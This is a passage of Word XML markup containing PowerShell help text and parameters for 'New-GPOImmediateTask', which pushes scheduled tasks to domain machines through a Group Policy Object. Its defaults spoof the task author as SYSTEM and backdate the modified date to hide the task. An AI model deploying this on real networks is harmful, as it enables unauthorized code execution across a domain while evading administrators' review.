    <w:p w14:paraId="7966C2EB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7650A5BB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF2FA96" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1A840584" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="55D45532" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>function New-GPOImmediateTask {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD53A80" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08322A74" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0793517A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="39A964AD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Builds an 'Immediate' schtask to push out through a specified GPO.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328812E5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2949B110" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER TaskName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1A6C70" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0FBEABF4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Name for the schtask to recreate. Required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D76A03" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="030ABBAD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCE935E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="08F86DD9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The command to execute with the task, defaults to 'powershell'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9AC924" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="76234377" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER CommandArguments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E020D2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4E57E40B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The arguments to supply to the -Command being launched.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD445FA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="168D4258" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER TaskDescription</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4436D820" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="070E1946" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        An optional description for the task.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42EC3725" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7B0C606D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER TaskAuthor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DC3B92" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE62130" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The displayed author of the task, defaults to ''NT AUTHORITY\System'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A93FD6A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0A6D9038" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER TaskModifiedDate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28427D7A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D46F97" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The displayed modified date for the task, defaults to 30 days ago.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C9A52A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="23D1DD4E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER GPOname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4523B0C8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0541D262" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The GPO name to build the task for.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4930B864" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6D1EB668" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER GPODisplayName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E48AB11" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="54D78B9C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The GPO display name to build the task for.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C13B0BE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4A705764" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D58699" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="64996B4E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The domain to query for the GPOs, defaults to the current domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB6735D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2E74A36F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER DomainController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAE9B7C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="048FCCCD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Domain controller to reflect LDAP queries through.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB08567" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5DFA8B58" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ADSpath</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC0A162" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4BFC1474" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The LDAP source to search through</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A976B1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        e.g. "LDAP://cn={8FF59D28-15D7-422A-BCB7-2AE45724125A},cn=policies,cn=system,DC=dev,DC=testlab,DC=local"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203B21E5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="17900D82" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C62FA5D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4C2B75DC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        A [Management.Automation.PSCredential] object of alternate credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A555BFA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        for connection to the target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B6649A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2B3E5F88" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E3BA5A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4570CF49" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS&gt; New-GPOImmediateTask -TaskName Debugging -GPODisplayName SecurePolicy -CommandArguments '-c "123 | Out-File C:\Temp\debug.txt"' -Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CCED07" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="37ADE04A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Create an immediate schtask that executes the specified PowerShell arguments and</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248239F2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        push it out to the 'SecurePolicy' GPO, skipping the confirmation prompt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F5C232" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1927C45E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A51993" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="49D2E48F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS&gt; New-GPOImmediateTask -GPODisplayName SecurePolicy -Remove -Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9718B8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="519C0B5B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Remove all schtasks from the 'SecurePolicy' GPO, skipping the confirmation prompt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6C8AF5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611BBE3B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    [CmdletBinding(DefaultParameterSetName = 'Create')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005DC67D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    Param (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28944FDA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(ParameterSetName = 'Create', Mandatory = $True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC818A4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03662785" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateNotNullOrEmpty()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0106C7ED" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $TaskName,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3081D2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6BF1545E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        [Parameter(ParameterSetName = 'Create')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243E81ED" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0B2A9B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateNotNullOrEmpty()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006E370E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Command = 'powershell',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F42D726" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="62449615" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(ParameterSetName = 'Create')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3EA1B1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CE07C7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateNotNullOrEmpty()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400D162A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $CommandArguments,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51181DED" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2540F0AE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(ParameterSetName = 'Create')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475E060C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1AD518" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateNotNullOrEmpty()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096DF8A7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $TaskDescription = '',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE8C6C1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2F1DBAC6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(ParameterSetName = 'Create')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2292FD8C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C159F80" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateNotNullOrEmpty()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6494E1D1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $TaskAuthor = 'NT AUTHORITY\System',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA7F38E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4C376640" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(ParameterSetName = 'Create')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045A9306" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C704A1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateNotNullOrEmpty()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0957D9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $TaskModifiedDate = (Get-Date (Get-Date).AddDays(-30) -Format u).trim("Z"),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607C04FC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="10D819C8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(ParameterSetName = 'Create')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D61C627" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(ParameterSetName = 'Remove')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFB9E5C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F7013E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $GPOname,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF78ED9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4330072E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(ParameterSetName = 'Create')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24903C37" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(ParameterSetName = 'Remove')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C62CEEA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A8C50C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $GPODisplayName,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369C0F43" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1C025622" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(ParameterSetName = 'Create')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AF1332" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(ParameterSetName = 'Remove')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77802B85" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B127CAA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Domain,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F45363C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7D3E89A3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(ParameterSetName = 'Create')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63333D5B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(ParameterSetName = 'Remove')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC5B1BD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4065CC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DomainController,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278DF730" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C50A922" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(ParameterSetName = 'Create')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7535C7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(ParameterSetName = 'Remove')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649CBE26" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C37B41C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ADSpath,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30057D20" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5D9DFE47" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(ParameterSetName = 'Create')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1130D8D7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(ParameterSetName = 'Remove')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FB6AED" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D41D020" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Force,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DA4726" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="10E84962" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(ParameterSetName = 'Remove')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A540081" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A42EC7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Remove,</w:t>
      </w:r>
    </w:p>
